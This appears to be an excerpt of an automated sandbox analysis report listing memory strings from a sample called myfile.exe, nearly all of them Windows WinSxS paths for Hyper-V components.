            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\S
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790\O
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\r\
            Source: myfile.exe, 00000000.00000003.1980534561.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987652819.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942504657.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981082622.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\jPY#
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\r\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\{
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\n\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981\
            Source: myfile.exe, 00000000.00000003.2365373242.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382799050.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a\O
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\r\
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\a
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\
            Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\f\m
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\f\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\r\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\o
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\r\
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\L
            Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf385
            Source: myfile.exe, 00000000.00000003.2008810311.0000000002BFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erStore\FileRepository\vmci.inf_amd64_68ed49469341f563\n
            Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\r\y
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\r\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5\o
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\f\#
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\V
            Source: myfile.exe, 00000000.00000003.1960456490.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1960597717.000000000420B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164\
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\!
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1999993146.000000000438B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\r\zB
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5\
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\f\Q
